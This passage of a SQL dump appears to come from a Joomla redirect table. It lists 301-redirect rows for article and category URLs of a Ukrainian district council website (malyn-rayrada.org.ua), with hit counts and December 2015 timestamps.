00:00:00',301),(20673,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&Itemid=0&lang=ru&option=com_content&view=article','','','',5,0,'2015-12-11 01:57:45','0000-00-00 00:00:00',301),(20674,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=817:---------------l--r&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:57:53','0000-00-00 00:00:00',301),(20675,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=716:2012-06-14-15-19-24&Itemid=82&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:58:11','0000-00-00 00:00:00',301),(20676,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=325:2011-05-20-16-14-21&Itemid=66&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:58:17','0000-00-00 00:00:00',301),(20677,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1186:-2013-i-2014-&Itemid=97&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:58:39','0000-00-00 00:00:00',301),(20678,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1057:--22072013--2100-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:58:45','0000-00-00 00:00:00',301),(20679,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1287:2014-04-23-06-49-34&Itemid=17&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:59:15','0000-00-00 00:00:00',301),(20680,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1143:2013-11-26-13-23-37&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:59:19','0000-00-00 00:00:00',301),(20681,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1013:2013-06-01-03-58-38&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:59:24','0000-00-00 00:00:00',301),(20682,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=196:---------------------2005-2010-&Itemid=60&lang=en&option=com_content&view=article','','','',5,0,'2015-12-11 01:59:47','0000-00-00 00:00:00',301),(20683,'http://www.malyn-rayrada.org.ua/index.php?catid=58:--30042014-&id=1306:2014-04-30-09-40-02&Itemid=105&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 01:59:52','0000-00-00 00:00:00',301),(20684,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=600:2012-03-01-06-12-24&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:59:57','0000-00-00 00:00:00',301),(20685,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1072:-24-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:00:02','0000-00-00 00:00:00',301),(20686,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=751:-15-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:00:34','0000-00-00 00:00:00',301),(20687,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=937:---------------------------21122012--l--&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:00:44','0000-00-00 00:00:00',301),(20688,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=924:2013-02-20-19-06-08&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:00:57','0000-00-00 00:00:00',301),(20689,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1011:2013-05-29-09-51-28&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:01:04','0000-00-00 00:00:00',301),(20690,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=712:2012-06-14-15-11-24&Itemid=82&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:01:17','0000-00-00 00:00:00',301),(20691,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=958:------------2010-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:01:23','0000-00-00 00:00:00',301),(20692,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=317:-l-2008-2012-r&Itemid=66&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:01:29','0000-00-00 00:00:00',301),(20693,'http://www.malyn-rayrada.org.ua/index.php?catid=21&id=27:2010-06-07-11-05-24&Itemid=47&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:01:51','0000-00-00 00:00:00',301),(20694,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&Itemid=0&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 02:02:18','0000-00-00 00:00:00',301),(20695,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=792:2012-10-17-06-26-37&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:02:38','0000-00-00 00:00:00',301),(20696,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=710:2012-06-14-15-07-29&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:02:56','0000-00-00 00:00:00',301),(20697,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1331:2014-06-04-07-15-27&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 02:03:02','0000-00-00 00:00:00',301),(20698,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=709:2012-06-14-15-04-11&Itemid=82&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:03:08','0000-00-00 00:00:00',301),(20699,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=596:2012-02-28-12-59-05&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:03:22','0000-00-00 00:00:00',301),(20700,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=998:1&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:03:34','0000-00-00 00:00:00',301),(20701,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=690:2012-05-29-18-50-09&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:03:46','0000-00-00 00:00:00',301),(20702,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1212:2014-02-07-07-01-38&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 02:04:11','0000-00-00 00:00:00',301),(20703,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1195:2014-01-28-13-01-27&Itemid=70&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:04:27','0000-00-00 00:00:00',301),(20704,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1161:2013-12-18-13-34-32&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:04:33','0000-00-00 00:00:00',301),(20705,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:04:39','0000-00-00 00:00:00',301),(20706,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=742:-14-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:04:44','0000-00-00 00:00:00',301),(20707,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1063:2013-08-02-17-32-04&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:05:26','0000-00-00 00:00:00',301),(20708,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1056:-22-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:05:31','0000-00-00 00:00:00',301),(20709,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=821:------12--2012--311-l------------r&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:05:49','0000-00-00 00:00:00',301),(20710,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=690:2012-05-29-18-50-09&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:05:58','0000-00-00 00:00:00',301),(20711,'http://www.malyn-rayrada.org.ua/index.php?catid=44:--12092012-&id=757:2012-09-12-09-47-49&Itemid=83&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:06:04','0000-00-00 00:00:00',301),(20712,'http://www.malyn-rayrada.org.ua/index.php?catid=20:2010-06-07-09-15-05&id=186:-6-&Itemid=42&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:06:16','0000-00-00 00:00:00',301),(20713,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1060:2013-07-27-10-13-15&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:06:41','0000-00-00 00:00:00',301),(20714,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1202:2014-01-31-07-45-54&Itemid=97&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:06:46','0000-00-00 00:00:00',301),(20715,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=635:-2011-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:07:01','0000-00-00 00:00:00',301),(20716,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1012:l-r&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:07:38','0000-00-00 00:00:00',301),(20717,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=475:2011-11-22-07-58-34&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:07:44','0000-00-00 00:00:00',301),(20718,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=794:-lr&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:07:50','0000-00-00 00:00:00',301),(20719,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:07:56','0000-00-00 00:00:00',301),(20720,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=411:------------2014-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:08:02','0000-00-00 00:00:00',301),(20721,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1001:2013-04-30-12-14-17&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:08:08','0000-00-00 00:00:00',301),(20722,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=543:2012-01-26-11-58-53&catid=39&Itemid=76&lang=uk','','','',10,0,'2015-12-11 02:08:09','0000-00-00 00:00:00',301),(20723,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=817:---------------l--r&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:08:14','0000-00-00 00:00:00',301),(20724,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:08:19','0000-00-00 00:00:00',301),(20725,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1154:7-&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:08:25','0000-00-00 00:00:00',301),(20726,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=412:-165-&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:08:39','0000-00-00 00:00:00',301),(20727,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=319:-2009-2011-&Itemid=66&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:08:56','0000-00-00 00:00:00',301),(20728,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1136:-2013-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:09:02','0000-00-00 00:00:00',301),(20729,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=669:-2011-56-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:09:15','0000-00-00 00:00:00',301),(20730,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1121:--24--6-&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:09:20','0000-00-00 00:00:00',301),(20731,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=530:-4050-vi-l-r-1-2013-&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:10:19','0000-00-00 00:00:00',301),(20732,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1113:2013-10-23-09-26-07&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:10:39','0000-00-00 00:00:00',301),(20733,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1303:2014-04-29-13-13-18&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 02:10:50','0000-00-00 00:00:00',301),(20734,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=483:-2012-2016-&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:11:01','0000-00-00 00:00:00',301),(20735,'http://www.malyn-rayrada.org.ua/index.php?id=49:--12042013-&Itemid=88&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-11 02:11:12','0000-00-00 00:00:00',301),(20736,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=549:-2010-2012-&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:11:23','0000-00-00 00:00:00',301),(20737,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1313:2014-05-14-10-00-55&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 02:11:49','0000-00-00 00:00:00',301),(20738,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1202:2014-01-31-07-45-54&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:12:08','0000-00-00 00:00:00',301),(20739,'http://www.malyn-rayrada.org.ua/index.php?id=38&Itemid=73&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',3,0,'2015-12-11 02:12:15','0000-00-00 00:00:00',301),(20740,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=793:2012-10-17-06-29-27&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:12:21','0000-00-00 00:00:00',301),(20741,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=600:2012-03-01-06-12-24&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:12:27','0000-00-00 00:00:00',301),(20742,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=437:-----l-r--2012-2015-&Itemid=72&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:12:32','0000-00-00 00:00:00',301),(20743,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=759:2012-09-14-08-35-05&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:12:54','0000-00-00 00:00:00',301),(20744,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1291:2014-04-23-11-37-34&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:13:00','0000-00-00 00:00:00',301),(20745,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=821:------12--2012--311-l------------r&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:13:19','0000-00-00 00:00:00',301),(20746,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:13:25','0000-00-00 00:00:00',301),(20747,'http://www.malyn-rayrada.org.ua/index.php?id=42:--16052012-&Itemid=80&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-11 02:13:37','0000-00-00 00:00:00',301),(20748,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1074:2013-09-02-05-02-30&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:13:43','0000-00-00 00:00:00',301),(20749,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=744:2012-07-28-09-50-03&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:14:03','0000-00-00 00:00:00',301),(20750,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=681:16-13-&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:14:09','0000-00-00 00:00:00',301),(20751,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=608:2012-03-15-08-40-03&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:14:15','0000-00-00 00:00:00',301),(20752,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=735:2012-07-18-13-32-43&Itemid=70&lang=ru&option=com_content&view=article','','','',5,0,'2015-12-11 02:14:27','0000-00-00 00:00:00',301),(20753,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1156:2013-12-09-07-12-03&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:15:17','0000-00-00 00:00:00',301),(20754,'http://www.malyn-rayrada.org.ua/index.php?id=57&Itemid=98&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 02:15:35','0000-00-00 00:00:00',301),(20755,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1298:2014-04-24-11-02-55&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 02:15:41','0000-00-00 00:00:00',301),(20756,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1069:23--------&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:15:47','0000-00-00 00:00:00',301),(20757,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=512:2011-12-21-12-46-13&Itemid=73&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:15:52','0000-00-00 00:00:00',301),(20758,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=201:--------l-r--2011--&Itemid=60&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:15:58','0000-00-00 00:00:00',301),(20759,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=882:2012-12-21-17-08-23&Itemid=85&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:16:04','0000-00-00 00:00:00',301),(20760,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=367:-1620-19072011-&lang=en&option=com_content&view=article','','','',5,0,'2015-12-11 02:16:52','0000-00-00 00:00:00',301),(20761,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',4,0,'2015-12-11 02:17:12','0000-00-00 00:00:00',301),(20762,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=855:2012-12-12-14-22-20&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:17:18','0000-00-00 00:00:00',301),(20763,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=763:2012-09-24-07-57-43&Itemid=0&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 02:17:24','0000-00-00 00:00:00',301),(20764,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1107:c-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:17:35','0000-00-00 00:00:00',301),(20765,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=998:1&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:18:08','0000-00-00 00:00:00',301),(20766,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=671:2012-05-09-13-09-05&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:18:13','0000-00-00 00:00:00',301),(20767,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=714:2012-06-14-15-15-43&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:18:41','0000-00-00 00:00:00',301),(20768,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:19:00','0000-00-00 00:00:00',301),(20769,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=750:2012-09-01-09-40-02&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:19:11','0000-00-00 00:00:00',301),(20770,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=651:-2012-&Itemid=80&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:19:17','0000-00-00 00:00:00',301),(20771,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=218:2010-12-21-06-45-54&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:19:28','0000-00-00 00:00:00',301),(20772,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=775:2012-10-02-09-35-53&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:19:34','0000-00-00 00:00:00',301),(20773,'http://www.malyn-rayrada.org.ua/index.php?id=51&Itemid=92&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2015-12-11 02:19:39','0000-00-00 00:00:00',301),(20774,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1155:2013-12-07-15-56-12&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:19:45','0000-00-00 00:00:00',301),(20775,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:20:23','0000-00-00 00:00:00',301),(20776,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=688:2012-05-25-16-34-51&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:20:28','0000-00-00 00:00:00',301),(20777,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=331:2011-05-20-16-30-09&Itemid=66&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:20:34','0000-00-00 00:00:00',301),(20778,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=671:2012-05-09-13-09-05&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:20:45','0000-00-00 00:00:00',301),(20779,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1082:-2012-2015-&Itemid=94&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:20:51','0000-00-00 00:00:00',301),(20780,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=968:-2012-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:20:56','0000-00-00 00:00:00',301),(20781,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1125:2013-10-31-07-20-16&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:21:07','0000-00-00 00:00:00',301),(20782,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1021:-l-r&Itemid=92&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 02:21:13','0000-00-00 00:00:00',301),(20783,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=279:2011-03-31-08-20-23&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:21:18','0000-00-00 00:00:00',301),(20784,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:21:31','0000-00-00 00:00:00',301),(20785,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1200:2014-01-31-07-40-52&Itemid=97&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:21:43','0000-00-00 00:00:00',301),(20786,'http://www.malyn-rayrada.org.ua/index.php?id=40&Itemid=77&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 02:21:48','0000-00-00 00:00:00',301),(20787,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=523:2011-12-30-10-16-28&Itemid=73&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:21:54','0000-00-00 00:00:00',301),(20788,'http://www.malyn-rayrada.org.ua/index.php?id=45:--14112012-&Itemid=84&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-11 02:21:59','0000-00-00 00:00:00',301),(20789,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1069:23--------&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:22:16','0000-00-00 00:00:00',301),(20790,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=619:-11-6-&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:22:52','0000-00-00 00:00:00',301),(20791,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=599:-l-r-2011-2016-&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:23:05','0000-00-00 00:00:00',301),(20792,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=983:2013-04-04-11-23-57&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:23:10','0000-00-00 00:00:00',301),(20793,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:23:29','0000-00-00 00:00:00',301),(20794,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=618:2012-03-29-08-39-48&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:23:34','0000-00-00 00:00:00',301),(20795,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=547:-l-r-2011-2016-&Itemid=76&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:23:40','0000-00-00 00:00:00',301),(20796,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=488:2011-12-02-06-34-46&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:23:51','0000-00-00 00:00:00',301),(20797,'http://www.malyn-rayrada.org.ua/index.php?catid=30:--30122010-&id=228:-2011-&Itemid=61&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:23:56','0000-00-00 00:00:00',301),(20798,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=828:-q-q&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:24:34','0000-00-00 00:00:00',301),(20799,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=910:-22-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:24:39','0000-00-00 00:00:00',301),(20800,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:24:45','0000-00-00 00:00:00',301),(20801,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1197:-l-r-&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:24:50','0000-00-00 00:00:00',301),(20802,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&lang=uk&option=com_content&view=article','','','',6,0,'2015-12-11 02:25:03','0000-00-00 00:00:00',301),(20803,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=717:2012-06-14-15-22-29&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:25:09','0000-00-00 00:00:00',301),(20804,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1171:2014-01-11-09-58-40&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:25:25','0000-00-00 00:00:00',301),(20805,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1166:2014-01-06-08-21-04&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:25:36','0000-00-00 00:00:00',301),(20806,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=512:2011-12-21-12-46-13&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:25:41','0000-00-00 00:00:00',301),(20807,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1326:-100-547&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 02:25:54','0000-00-00 00:00:00',301),(20808,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=750:2012-09-01-09-40-02&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:25:59','0000-00-00 00:00:00',301),(20809,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=669:-2011-56-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:26:04','0000-00-00 00:00:00',301),(20810,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=784:-9-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:26:21','0000-00-00 00:00:00',301),(20811,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=833:2012-11-30-06-51-18&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:26:32','0000-00-00 